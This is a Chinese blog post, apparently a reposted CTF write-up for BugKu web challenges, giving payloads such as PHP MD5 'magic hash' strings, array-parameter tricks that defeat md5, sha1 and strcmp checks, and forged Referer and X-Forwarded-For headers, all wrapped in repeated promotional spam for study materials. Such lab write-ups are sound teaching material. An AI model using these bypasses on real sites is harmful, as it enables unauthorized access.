网络安全最新CTF BugKu平台———(Web篇②）_buktu攻防平台，2024年最新开源至上

本文链接：https://blog.youkuaiyun.com/FZBH_Q/article/details/138637217

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

在这里插入图片描述

因篇幅有限，仅展示部分资料

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

大概的意思是将get的两个参数中的key替换为空，然后对key1,key2的值进行md5加密，
如果md5加密的值一样而未加密的值不同，就输出flag.

MD5绕过：
下列的字符串的MD5值都是0e开头的：

QNKCDZO

240610708

s878926199a

s155964671a

s214587387a

pyload：http://114.67.175.224:10088/?kekeyy1=QNKCDZO&kekeyy2=240610708
在这里插入图片描述

shell：

在这里插入图片描述

cookies：

http://114.67.175.224:18865/index.php?line=&filename=a2V5cy50eHQ=

line ：可能是个列的参数意思 “a2V5cy50eHQ=” base64解码得到 “keys.txt”

在这里插入图片描述

前女友：

F12 查看源码发现了一个code.txt
在这里插入图片描述

<?php
if(isset($\_GET['v1']) && isset($\_GET['v2']) && isset($\_GET['v3'])){
    $v1 = $\_GET['v1'];
    $v2 = $\_GET['v2'];
    $v3 = $\_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

大概的意思就是v1不等于v2，v1和v2的md5相等，strcmp是比较字符串（区分大小写），v3不等于flag。
payload：http://114.67.175.224:10561/?v1[]=1&v2[]=2&v3[]=1
在这里插入图片描述

你从哪里来

在这里插入图片描述
直接bp抓包伪造referer头 Referer:https:www.google.com

MD5：

在这里插入图片描述
让我们输入一个a 然后输入：s155964671a （考的MD5碰撞，网上有很多随便找一个即可。）

程序员本地网站：

在这里插入图片描述
直接bp抓包然后添加一条：X-Forwarded-For: 127.0.0.1 即可获取flag。

各种绕过哟：

在这里插入图片描述

<?php
highlight_file('flag.php');
$\_GET['id'] = urldecode($\_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($\_GET['uname']) and isset($\_POST['passwd'])) {
    if ($\_GET['uname'] == $\_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($\_GET['uname']) === sha1($\_POST['passwd'])&($\_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

大概就是使uname的sha1和值与passwd的sha1的值相等即可，但是同时他们两个的值又不能相等。
payload：http://114.67.175.224:12978/?uname[]=1&id=margin

在这里插入图片描述

file_get_contents：

<?php
extract($\_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>


**先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7**

**深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/8ec7d110d98a8f79b26fe9f8eba1d17e.png)
![img](https://img-blog.csdnimg.cn/img_convert/450d7874b86d00b0e0116dcf8c05685d.png)
![img](https://img-blog.csdnimg.cn/img_convert/1738a770e5e3bedb4cc2c191963b7866.png)
![img](https://img-blog.csdnimg.cn/img_convert/6d41f5d4c7b7a5d55e26d17037408596.png)
![img](https://img-blog.csdnimg.cn/img_convert/cc95e3c7685650c0343fbaa41c5bb74d.png)
![img](https://img-blog.csdnimg.cn/img_convert/720ff59b6d424e61318234cf14eac455.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.youkuaiyun.com/topics/618540462)**

7029)]

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.youkuaiyun.com/topics/618540462)**